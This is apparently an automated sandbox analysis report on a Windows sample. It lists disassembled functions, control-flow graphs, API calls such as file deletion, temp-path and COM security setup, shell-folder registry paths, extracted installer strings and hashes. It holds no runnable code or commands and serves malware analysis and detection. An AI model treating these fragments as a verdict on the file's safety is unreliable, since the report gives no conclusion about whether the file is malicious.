                                                                                                                • Instruction ID: 4d22c4ef6a11e428898ada22df9821126b6f08c575dc9fd769d40b18eaac3224
                                                                                                                • Opcode Fuzzy Hash: 8ed11d18685dcf33048ac6650db020507c19ef213b46d08b148489560b746fec
                                                                                                                • Instruction Fuzzy Hash: D932A1716043429BDB20DF64DCC4FAB7BA9AF95704F00493EF94497242E778E905CBAA
                                                                                                                Function 00479232 Relevance: 67.4, APIs: 16, Strings: 22, Instructions: 931sleepfilewindowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 872 479232-4792a9 call 4aef44 call 4c5f18 call 4a8605 call 4d4165 6FAA1CD0 CoInitialize call 49a3d0 883 4792b2-4792b9 call 4cdc20 872->883 884 4792ab-4792b0 call 49a520 872->884 887 4792be-47930e call 4b1fca call 4b1f9b GetModuleFileNameA call 4c2c3a call 4c2892 883->887 884->887 897 479314-479392 call 4c281a call 4c5fe3 call 4c5eaa call 4c2c4d call 4c5fe3 call 4c5f18 call 47a22e 887->897 898 479f58-479f69 call 4cdc20 887->898 925 479394-479399 897->925 926 4793a0-4793dc call 4c5f18 call 47a22e call 4c5fe3 call 4c5eaa 897->926 901 479f6e 898->901 903 479f70-479f9f call 4c5eaa * 4 901->903 922 479fa1-479faf 903->922 925->926 935 4793de-4793e5 call 46dd46 926->935 936 4793ea-479410 call 4c5f18 call 47a22e 926->936 935->936 942 479416-479432 Sleep call 4c28c2 936->942 943 4796e3-479709 call 4c5f18 call 47a22e 936->943 948 479434-47945e call 4c279e call 4c5fe3 call 4c5eaa 942->948 949 479463-479535 call 40ae8e call 4c5fe3 call 4c613f call 4c60d9 call 4c5fe3 call 4c5eaa * 2 call 4c279e call 40afe1 942->949 954 47970f-47972b Sleep call 4c28c2 943->954 955 4797bd-4797f8 call 4c5f18 call 47a22e call 4c5fe3 call 4c5eaa 943->955 948->949 1013 47953b-4795bd call 4c5f18 call 4c6286 call 4c61b3 call 4c613f call 4c62c2 call 4c5eaa * 2 call 4c5f18 949->1013 1014 4796c8-4796de call 4c5eaa call 40af5a 949->1014 967 47972d-479757 call 4c279e call 4c5fe3 call 4c5eaa 954->967 968 47975c-4797b7 call 4c613f call 4c60d9 call 4c5fe3 call 4c5eaa * 2 SetFileAttributesA DeleteFileA 954->968 991 479803-479808 955->991 992 4797fa-479801 955->992 967->968 968->955 996 47980b-4798c1 call 4c5f18 call 473bec call 4c5f18 call 473bec call 4c6033 GetTempPathA call 4c2c3a call 4c2c4d call 4c5f18 call 47a22e 991->996 992->996 1042 4798c3-4798c6 996->1042 1043 47993c-4799ad call 4c5f18 call 4c5c1f call 47a400 call 4c5fe3 call 4c5eaa call 4c5c1f call 40ca76 996->1043 1056 4795bf-4795eb call 4c6033 call 4c63cc call 4c28c2 1013->1056 1057 47961d-4796c3 call 4c5eaa Sleep call 4c613f call 4c60d9 call 40e49e call 4c5eaa * 4 call 40af5a 1013->1057 1014->943 1042->1043 1045 4798c8-47990a call 4c279e call 4c5fe3 call 4c5eaa call 4c2c4d GetFileAttributesA 1042->1045 1101 4799af-4799e5 call 4c61b3 call 4cdc20 1043->1101 1102 4799ea-479a14 call 479fb0 call 4c5fe3 call 4c5eaa 1043->1102 1078 479921-479929 GetFileAttributesA 1045->1078 1079 47990c-479920 call 4c5c1f call 40ca76 1045->1079 1089 47960f-47961b 1056->1089 1090 4795ed-47960a call 4c6286 call 4c62c2 call 4c6286 1056->1090 1134 479b37-479b80 call 4c5eaa * 6 1057->1134 1078->1043 1081 47992b-479937 call 4c5fe3 1078->1081 1079->1078 1081->1043 1089->1056 1089->1057 1090->1089 1119 479f09 call 4c5eaa 1101->1119 1126 479a1a-479a24 GetFileAttributesA 1102->1126 1127 479eb9-479f06 call 4c61b3 call 4c613f call 4cdc20 call 4c5eaa 1102->1127 1124 479f0e-479f56 call 4c5eaa * 6 1119->1124 1124->901 1126->1127 1128 479a2a-479a3e call 46deea 1126->1128 1127->1119 1140 479a92-479aac call 46e2ec 1128->1140 1141 479a40-479a90 call 4c61b3 call 4c613f call 4cdc20 call 4c5eaa 1128->1141 1134->922 1158 479b85-479ba4 call 4c5c1f call 46e515 1140->1158 1159 479ab2-479aff call 4c61b3 call 4c613f call 4cdc20 call 4c5eaa 1140->1159 1191 479b02-479b32 call 4c5eaa * 5 1141->1191 1182 479ba6-479bbc call 4cdc20 1158->1182 1183 479bc1-479c71 call 4c2c3a call 4c5f18 call 473bec call 44ef41 call 4c5c1f call 4167ae call 4c5f18 call 47a22e call 4c5fe3 call 4c5eaa 1158->1183 1159->1191 1182->1124 1225 479c77-479c8b call 4c512e 1183->1225 1226 479cf8-479d0c call 4c512e 1183->1226 1191->1134 1233 479c8d-479c96 call 46cc81 1225->1233 1234 479c98 1225->1234 1231 479d17 1226->1231 1232 479d0e-479d10 call 474120 1226->1232 1238 479d19-479d26 1231->1238 1241 479d15 1232->1241 1236 479c9a-479cc3 GetDesktopWindow call 4c69ad call 4c9ede 1233->1236 1234->1236 1251 479cc5-479cd1 call 4cdc20 1236->1251 1252 479cd3-479ce7 call 4c69ad call 4c9543 1236->1252 1242 479d31-479d57 UpdateWindow PostMessageA call 4c5eaa 1238->1242 1243 479d28-479d2c call 4c9592 1238->1243 1241->1238 1248 479d5c-479d9b call 4c5eaa * 5 1242->1248 1243->1242 1248->903 1251->1226 1263 479cec-479cf3 call 4c9592 1252->1263 1263->1226
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00479237
                                                                                                                • 6FAA1CD0.COMCTL32(00523A30), ref: 00479292
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00479299
                                                                                                                  • Part of subcall function 0049A3D0: TlsAlloc.KERNEL32(004792A7,?), ref: 0049A3D9
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,ERROR: Failed to initialize unzip library.,00000000,00000000,?), ref: 004792D9
                                                                                                                  • Part of subcall function 0049A520: GlobalAlloc.KERNEL32(00000040,000095B6,7556DF20,00000000,0049D7C5), ref: 0049A534
                                                                                                                  • Part of subcall function 0049A520: TlsSetValue.KERNEL32(0000001C,00000000), ref: 0049A547
                                                                                                                  • Part of subcall function 0047A22E: __EH_prolog.LIBCMT ref: 0047A233
                                                                                                                • Sleep.KERNEL32(000001F4,00523A30,00000000,?,00000000,00510864,?,00514880,?,/TUDEL,00510864,?,00000016,00000000,?,00000000), ref: 0047962E
                                                                                                                  • Part of subcall function 004C6286: lstrlen.KERNEL32(00000001,?,?,0040264F,?,00000000,00000000,?,00000000,00000000,?,?,00000000,?,?,00402920), ref: 004C6297
                                                                                                                  • Part of subcall function 0040AF5A: __EH_prolog.LIBCMT ref: 0040AF5F
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 004C6033: lstrlen.KERNEL32(?,?,00000000,004C5E52,005247C8,00403DCA,00000000,00403C1B,00000000,00000000,004019FC,?), ref: 004C6044
                                                                                                                • GetTempPathA.KERNEL32(00000104,?,update,_UseSystemCharacterSet,?,00000000,_ClientRestarted,?,00000001,00000000,?,/TURC,?,00000000,?,/TUDEL), ref: 00479868
                                                                                                                • Sleep.KERNEL32(000001F4,?,/TUCPS,?,00000000,00000000,?,/NOAUTOPROXY,?,00000001,?,/NOINIT,?,00000001,00523C9C,00510870), ref: 0047941B
                                                                                                                  • Part of subcall function 004C279E: __EH_prolog.LIBCMT ref: 004C27A3
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                • Sleep.KERNEL32(000001F4,?,/TUDEL,?,00000000,?,/TUCPS,?,00000000,00000000,?,/NOAUTOPROXY,?,00000001,?,/NOINIT), ref: 00479714
                                                                                                                • SetFileAttributesA.KERNEL32(?,00000080,00000000,?,00000000,?,?,00523C84,00510870,00514880,00000000,?,00000000,?,/TUCPS), ref: 004797AE
                                                                                                                • DeleteFileA.KERNEL32(?,?,00000000,?,/TUCPS,?,00000000,00000000,?,/NOAUTOPROXY,?,00000001,?,/NOINIT,?,00000001), ref: 004797B7
                                                                                                                • GetFileAttributesA.KERNEL32(?,00000000,?,?,00000000,?,00523C80,?,_ir_tu2_temp,?,?,/T:,?,00000000,00510870,?), ref: 00479A1B
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                • GetFileAttributesA.KERNEL32(?,00510870,00000000,?,?,?,/T:,?,00000000,00510870,?,00000000,0000005C), ref: 00479905
                                                                                                                • GetFileAttributesA.KERNEL32(?,?,00000000,00510870,?,00000000,0000005C), ref: 00479924
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0040CA76: __EH_prolog.LIBCMT ref: 0040CA7B
                                                                                                                  • Part of subcall function 0040CA76: GetCurrentDirectoryA.KERNEL32(00000104,?,0000005C,0000005C,?,00000000,00510870), ref: 0040CACE
                                                                                                                  • Part of subcall function 0040CA76: SetCurrentDirectoryA.KERNEL32(?,?,00000000,00510870), ref: 0040CB2D
                                                                                                                  • Part of subcall function 0040CA76: CreateDirectoryA.KERNEL32(?,00000000,?,00000000,00510870), ref: 0040CB3F
                                                                                                                  • Part of subcall function 0040CA76: SetCurrentDirectoryA.KERNEL32(?,?,00000000,00510870), ref: 0040CBF3
                                                                                                                • GetDesktopWindow.USER32 ref: 00479CA4
                                                                                                                • UpdateWindow.USER32(?), ref: 00479D37
                                                                                                                • PostMessageA.USER32(?,00000401,00000000,00000000), ref: 00479D4A
                                                                                                                  • Part of subcall function 0046CC81: __EH_prolog.LIBCMT ref: 0046CC86
                                                                                                                  • Part of subcall function 004C9543: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,004C8BF3,?,004C8BF3,00000000,?,?,000000FF,000000FF,00000015), ref: 004C956A
                                                                                                                  • Part of subcall function 004C9592: ShowWindow.USER32(?,?,004CA545,00000000,0000E146,00000000,?,?,0040A373), ref: 004C95A0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileH_prolog$AttributesDirectoryWindow$CurrentInterlockedSleeplstrlen$AllocIncrement$CreateDecrementDeleteDesktopGlobalInitializeMessageModuleNamePathPostShowTempUpdateValue
                                                                                                                • String ID: $ data file (2).$ data file.$/NOAUTOPROXY$/NOFOCUS$/NOINIT$/T:$/TUCPS$/TUDEL$/TURC$ERROR: Failed to initialize unzip library.$Failed to create debug window.$Failed to create temporary folder: $Failed to extract resource files$Failed to find $Failed to load $Invalid application name.$_ClientRestarted$_SilentInstall$_UseSystemCharacterSet$_ir_tu2_temp$update
                                                                                                                • API String ID: 4225372811-3327941068
                                                                                                                • Opcode ID: a3e67d8edf0ba3c45cf105c75eb0547da319d14f3b1e9d854efc8646a282e173
                                                                                                                • Instruction ID: feba658612b1a881b226761b1606b2c9e9650df82c332d2741d926b4ffbe1704
                                                                                                                • Opcode Fuzzy Hash: a3e67d8edf0ba3c45cf105c75eb0547da319d14f3b1e9d854efc8646a282e173
                                                                                                                • Instruction Fuzzy Hash: 08829474900648EEDB44EBA5C985FEEBBB8AF15308F10415EF405A3282DB786F49DB35
                                                                                                                Function 004352FE Relevance: 53.1, APIs: 3, Strings: 27, Instructions: 575COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1269 4352fe-43536c call 4aef44 call 41ef1b call 41ebe5 call 41ee69 call 4b0108 call 4c5f18 call 4146d3 call 4146d6 1285 435371-435393 call 4c5fe3 call 4c5eaa 1269->1285 1290 4353a6-4353d8 call 403af0 1285->1290 1291 435395-4353a1 call 4c5fe3 1285->1291 1297 435590-435593 1290->1297 1298 4353de-4353e1 1290->1298 1296 435a59-435aa7 call 41eea7 call 4815f0 call 45aad3 call 4c5eaa * 2 1291->1296 1299 435679-43567c 1297->1299 1300 435599 1297->1300 1302 435570-43558b call 4c6033 * 2 1298->1302 1303 4353e7-4353ea 1298->1303 1307 4356e9-4356ff call 4c6033 * 2 1299->1307 1308 43567e-435681 1299->1308 1305 435655-435674 call 4c6033 * 2 1300->1305 1306 43559f-4355a2 1300->1306 1375 435704-435707 call 4c6033 1302->1375 1310 4353f0 1303->1310 1311 4354bc-4354bf 1303->1311 1305->1375 1316 435639-435650 call 4c6033 * 2 1306->1316 1317 4355a8-4355aa 1306->1317 1307->1375 1318 435683-435684 1308->1318 1319 4356cc-4356e7 call 4c6033 * 2 1308->1319 1322 4354a0-4354b7 call 4c6033 * 2 1310->1322 1323 4353f6-4353f8 1310->1323 1313 4354c5-4354c8 1311->1313 1314 435554-43556b call 4c6033 * 2 1311->1314 1326 4354ca-4354cc 1313->1326 1327 435538-43554f call 4c6033 * 2 1313->1327 1314->1375 1316->1375 1329 43561d-435634 call 4c6033 * 2 1317->1329 1330 4355ac-4355af 1317->1330 1333 435686-435687 1318->1333 1334 4356af-4356ca call 4c6033 * 2 1318->1334 1319->1375 1322->1375 1338 435484-43549b call 4c6033 * 2 1323->1338 1339 4353fe-435401 1323->1339 1352 435518-435533 call 4c6033 * 2 1326->1352 1353 4354ce-4354cf 1326->1353 1327->1375 1329->1375 1355 4355b1-4355b4 1330->1355 1356 4355fd-435618 call 4c6033 * 2 1330->1356 1357 435692-4356ad call 4c6033 * 2 1333->1357 1358 435689-435690 1333->1358 1334->1375 1338->1375 1348 435403-435405 1339->1348 1349 435468-43547f call 4c6033 * 2 1339->1349 1372 435407-43540a 1348->1372 1373 43544c-435463 call 4c6033 * 2 1348->1373 1349->1375 1352->1375 1376 4354d1-4354d2 1353->1376 1377 4354f8-435513 call 4c6033 * 2 1353->1377 1379 4355b6-4355b7 1355->1379 1380 4355d9-4355f8 call 4c6033 * 2 1355->1380 1356->1375 1357->1375 1381 43570c-435743 call 403d43 call 403d6d call 403d97 call 403e6d 1358->1381 1396 435430-435447 call 4c6033 * 2 1372->1396 1397 43540c-43540e 1372->1397 1373->1375 1375->1381 1376->1358 1401 4354d8-4354f3 call 4c6033 * 2 1376->1401 1377->1375 1379->1358 1402 4355bd-4355d4 call 4c6033 * 2 1379->1402 1380->1375 1453 435795-4357ae GetVersionExA 1381->1453 1454 435745-435787 call 4c5f18 call 40414b call 4c5fe3 call 4c5eaa 1381->1454 1396->1375 1397->1358 1415 435414-43542b call 4c6033 * 2 1397->1415 1401->1375 1402->1375 1415->1375 1455 4357b4-4357c5 call 4af56e 1453->1455 1456 435a29-435a54 call 4c5eaa * 3 call 404bfb 1453->1456 1454->1453 1490 435789-435790 call 4c5fe3 1454->1490 1455->1456 1465 4357cb-4357d2 1455->1465 1456->1296 1465->1456 1468 4357d8-4357de 1465->1468 1471 4358e0-4358e3 1468->1471 1472 4357e4 1468->1472 1478 435981-435984 1471->1478 1479 4358e9 1471->1479 1475 4358c7-4358de call 4c6033 * 2 1472->1475 1476 4357ea-4357ed 1472->1476 1527 435956-43595e call 4c6033 1475->1527 1481 435853-435856 1476->1481 1482 4357ef 1476->1482 1484 435986-435989 1478->1484 1485 435998-4359cf call 403d43 call 403d6d call 403d97 call 403e6d 1478->1485 1487 435960-43597f call 4c6033 * 2 1479->1487 1488 4358eb-4358ee 1479->1488 1481->1485 1489 43585c-43585f 1481->1489 1491 4357f1-4357f3 1482->1491 1492 435837-43584e call 4c6033 * 2 1482->1492 1484->1485 1495 43598b-43598c 1484->1495 1485->1456 1562 4359d1-435a12 call 4c5f18 call 40414b call 4c5fe3 call 4c5eaa 1485->1562 1487->1527 1488->1485 1496 4358f4-4358f6 1488->1496 1489->1485 1498 435865-435867 1489->1498 1490->1453 1491->1485 1500 4357f9-4357fc 1491->1500 1492->1527 1495->1485 1503 43598e-43598f 1495->1503 1505 4358f8-4358fb 1496->1505 1506 43593f-435951 call 4c6033 * 2 1496->1506 1508 4358ab-4358c2 call 4c6033 * 2 1498->1508 1509 435869-43586a 1498->1509 1500->1485 1511 435802-435804 1500->1511 1503->1485 1514 435991 1503->1514 1516 435926-43593d call 4c6033 * 2 1505->1516 1517 4358fd-435900 1505->1517 1506->1527 1508->1527 1520 43588f-4358a6 call 4c6033 * 2 1509->1520 1521 43586c-43586d 1509->1521 1511->1485 1525 43580a-43580d 1511->1525 1514->1485 1516->1527 1517->1485 1529 435906-435907 1517->1529 1520->1527 1521->1514 1532 435873-43588a call 4c6033 * 2 1521->1532 1525->1485 1538 435813-435815 1525->1538 1527->1485 1529->1514 1530 43590d-435924 call 4c6033 * 2 1529->1530 1530->1527 1532->1527 1538->1514 1548 43581b-435832 call 4c6033 * 2 1538->1548 1548->1527 1574 435a22 1562->1574 1575 435a14-435a20 call 4c5fe3 1562->1575 1574->1456 1575->1456
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00435303
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00435334
                                                                                                                  • Part of subcall function 004146D6: __EH_prolog.LIBCMT ref: 004146DB
                                                                                                                  • Part of subcall function 004146D6: SHGetSpecialFolderLocation.SHELL32(00000000,?,?), ref: 00414702
                                                                                                                  • Part of subcall function 004146D6: SHGetPathFromIDList.SHELL32(?,?), ref: 00414716
                                                                                                                  • Part of subcall function 004146D6: SHGetMalloc.SHELL32(?), ref: 00414725
                                                                                                                  • Part of subcall function 004146D6: lstrlen.KERNEL32(?), ref: 0041474D
                                                                                                                  • Part of subcall function 004146D6: lstrlen.KERNEL32(?), ref: 00414760
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                • GetVersionExA.KERNEL32(?,00000000,00020019,00000000,00000000,00000000,00000000,?,?,?,Common Documents,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,LocalMachine,00000000,00000000,00523A30), ref: 004357A6
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlockedlstrlen$DecrementFolderFromIncrementListLocationMallocPathSpecialVersion__ftol
                                                                                                                • String ID: AppData$Common AppData$Common Desktop$Common Documents$Common Programs$Common Start Menu$Common Startup$CommonFilesDir$CommonMusic$CommonPictures$CommonVideo$CurrentUser$Desktop$Fonts$Local AppData$LocalMachine$My Music$My Pictures$My Video$Personal$ProgramFilesDir$Programs$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$Software\Microsoft\Windows\CurrentVersion$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$Start Menu$Startup
                                                                                                                • API String ID: 3622249116-2480596902
                                                                                                                • Opcode ID: 5d34eb7f21a364bad13b3011b6efcff65f05efacfa8e524c422aef1bb6f121b9
                                                                                                                • Instruction ID: 2500f404392f3e3392d40bcb7433cb23fa29a4595c5d115e66c929809bea2158
                                                                                                                • Opcode Fuzzy Hash: 5d34eb7f21a364bad13b3011b6efcff65f05efacfa8e524c422aef1bb6f121b9
                                                                                                                • Instruction Fuzzy Hash: 6F129474800549EADB1CEBAADC96EFEBB74BF24348F00502FF102721D1DA785B85CA59
                                                                                                                Function 10007BF0 Relevance: 51.5, APIs: 28, Strings: 1, Instructions: 769comsleepmemoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1578 10007bf0-10007c52 CoInitializeEx 1579 10007c58-10007c5f 1578->1579 1580 10007e3a-10007e3c 1578->1580 1582 10007c61-10007c7b CoInitializeSecurity 1579->1582 1583 10007c9f-10007cc0 CoCreateInstance 1579->1583 1581 100084cd-100084ea call 10008d24 1580->1581 1586 10007c88-10007c98 call 1000e41c call 1000bf28 1582->1586 1587 10007c7d-10007c82 1582->1587 1584 10007e34 CoUninitialize 1583->1584 1585 10007cc6-10007db1 VariantClear * 4 1583->1585 1584->1580 1599 10007db3-10007dd7 call 10006fc0 1585->1599 1600 10007e2e-10007e30 1585->1600 1586->1583 1587->1584 1587->1586 1603 10007dd9-10007ddb 1599->1603 1604 10007ddd 1599->1604 1600->1584 1605 10007ddf-10007dfc call 10007190 1603->1605 1604->1605 1609 10007e2b 1605->1609 1610 10007dfe-10007e05 1605->1610 1609->1600 1611 10007ea8-10007eac 1610->1611 1612 10007e0b-10007e20 1610->1612 1613 10007f02-10007f17 1611->1613 1614 10007eae-10007ec3 1611->1614 1617 10007e41-10007e5c call 100078f0 1612->1617 1618 10007e22-10007e26 1612->1618 1613->1618 1620 10007f1d-10007f21 1613->1620 1614->1618 1622 10007ec9-10007efd call 100078f0 CoUninitialize 1614->1622 1628 10007e7e 1617->1628 1629 10007e5e-10007e7c SysFreeString 1617->1629 1618->1609 1623 10007f60-10007f74 call 100078f0 1620->1623 1624 10007f23-10007f36 call 100078f0 1620->1624 1649 100084ca 1622->1649 1634 10007f79-10007f7b 1623->1634 1635 10007f38-10007f5b CoUninitialize 1624->1635 1636 10007f9e-10007fca 1624->1636 1633 10007e82-10007ea3 CoUninitialize 1628->1633 1629->1633 1633->1649 1634->1636 1639 10007f7d-10007f98 SysFreeString Sleep 1634->1639 1635->1581 1653 10007fe2-10007ff8 1636->1653 1654 10007fcc-10007fdd CoUninitialize 1636->1654 1639->1636 1649->1581 1657 10008115-1000812f CoUninitialize 1653->1657 1658 10007ffe-10008016 call 100073f0 1653->1658 1654->1581 1657->1581 1658->1657 1664 1000801c-10008032 1658->1664 1664->1657 1666 10008038-1000805b call 100090ce 1664->1666 1669 10008082 1666->1669 1670 1000805d-1000807a SysAllocString 1666->1670 1673 10008084-10008090 1669->1673 1671 10008080 1670->1671 1672 100084ed-100084f2 call 10008ad0 1670->1672 1671->1673 1676 100084f7-10008501 call 10008ad0 1672->1676 1675 10008096-1000809f 1673->1675 1673->1676 1679 100080a3-100080b6 1675->1679 1680 100080f0-100080f2 1679->1680 1681 100080b8-100080bc 1679->1681 1684 100080f4-100080fe 1680->1684 1685 1000810c-10008110 1680->1685 1682 100080cb-100080d0 1681->1682 1683 100080be-100080c5 SysFreeString 1681->1683 1686 100080e2-100080ed call 100090fe 1682->1686 1687 100080d2-100080db call 1000910c 1682->1687 1683->1682 1684->1685 1693 10008100-1000810a 1684->1693 1685->1657 1686->1680 1687->1686 1693->1685 1695 10008134-10008153 1693->1695 1695->1657 1698 10008155-1000816d call 10007780 1695->1698 1698->1657 1702 1000816f-10008185 1698->1702 1702->1657 1704 10008187-1000818b 1702->1704 1705 10008191-100081a9 1704->1705 1706 1000824d-10008252 1704->1706 1711 100081ab-100081c5 1705->1711 1712 1000821c-1000823f CoUninitialize 1705->1712 1707 10008254-1000826c 1706->1707 1708 10008289-100082a8 1706->1708 1707->1712 1714 1000826e-10008287 call 10007570 1707->1714 1708->1657 1719 100082ae-100082d1 1708->1719 1721 10008213-10008217 1711->1721 1722 100081c7-100081e7 call 10006fc0 1711->1722 1712->1581 1714->1708 1714->1712 1719->1657 1733 100082d7-100082fc 1719->1733 1721->1712 1729 100081e9-100081eb 1722->1729 1730 100081ed 1722->1730 1731 100081ef-10008211 call 10007190 1729->1731 1730->1731 1731->1721 1741 10008244-10008248 1731->1741 1733->1657 1740 10008302-10008326 call 10007250 1733->1740 1740->1657 1745 1000832c-100083d2 call 10008510 call 10006fc0 1740->1745 1741->1706 1752 100083d4-100083d6 1745->1752 1753 100083d8 1745->1753 1754 100083da-1000843b call 10007190 1752->1754 1753->1754 1760 1000845b-1000845f 1754->1760 1761 1000843d-10008459 CoUninitialize 1754->1761 1762 10008461-1000849a 1760->1762 1763 1000849d-100084be CoUninitialize 1760->1763 1769 100084c2-100084c5 call 10007130 1761->1769 1762->1763 1763->1769 1769->1649
                                                                                                                APIs
                                                                                                                • CoInitializeEx.COMBASE(00000000,00000000), ref: 10007C4A
                                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 10007C73
                                                                                                                • CoCreateInstance.COMBASE(1001C290,00000000,00000001,1001C250,?), ref: 10007CB8
                                                                                                                • VariantInit.OLEAUT32(?), ref: 10007CD5
                                                                                                                • VariantInit.OLEAUT32(?), ref: 10007CF7
                                                                                                                • VariantInit.OLEAUT32(?), ref: 10007D12
                                                                                                                • VariantInit.OLEAUT32(?), ref: 10007D2A
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10007D78
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10007D85
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10007D92
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10007DA6
                                                                                                                • CoUninitialize.COMBASE ref: 10007E34
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 10007E70
                                                                                                                • CoUninitialize.COMBASE ref: 10007E9D
                                                                                                                • CoUninitialize.COMBASE ref: 10007EF7
                                                                                                                • CoUninitialize.COMBASE ref: 10007F53
                                                                                                                  • Part of subcall function 100078F0: VariantClear.OLEAUT32(?), ref: 1000799B
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 10007F8D
                                                                                                                • Sleep.KERNEL32(000000C8), ref: 10007F98
                                                                                                                • CoUninitialize.COMBASE ref: 10007FD5
                                                                                                                • CoUninitialize.COMBASE ref: 10008127
                                                                                                                  • Part of subcall function 100073F0: SysAllocString.OLEAUT32(1001C92C), ref: 10007450
                                                                                                                  • Part of subcall function 100073F0: SysFreeString.OLEAUT32 ref: 1000749D
                                                                                                                • SysAllocString.OLEAUT32(1001C948), ref: 10008070
                                                                                                                  • Part of subcall function 10007190: SysFreeString.OLEAUT32(-00000001), ref: 100071B0
                                                                                                                • SysFreeString.OLEAUT32 ref: 100080BF
                                                                                                                • CoUninitialize.COMBASE ref: 10008237
                                                                                                                • CoUninitialize.COMBASE ref: 1000844F
                                                                                                                • VariantInit.OLEAUT32(?), ref: 10008470
                                                                                                                • CoUninitialize.COMBASE ref: 100084B8
                                                                                                                • _com_issue_error.COMSUPP ref: 100084F2
                                                                                                                • _com_issue_error.COMSUPP ref: 100084FC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$Uninitialize$String$ClearFreeInit$AllocInitialize_com_issue_error$CreateInstanceSecuritySleep
                                                                                                                • String ID: p=5w
                                                                                                                • API String ID: 650882152-177745770
                                                                                                                • Opcode ID: 425b096067244566d44644910e84a7b61f5042f827703adda79f2fe503af621e
                                                                                                                • Instruction ID: 8d7122ccc858a2ae0a74686297e786b32690aa2f1e9f8907acda250850000a5e
                                                                                                                • Opcode Fuzzy Hash: 425b096067244566d44644910e84a7b61f5042f827703adda79f2fe503af621e
                                                                                                                • Instruction Fuzzy Hash: 8F621E70E00258AFEB10DFA4C848F9DBBB9FF49344F148198F949AB265DB71AD85CB50
                                                                                                                Function 100042D0 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 209memorynetworksleepCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

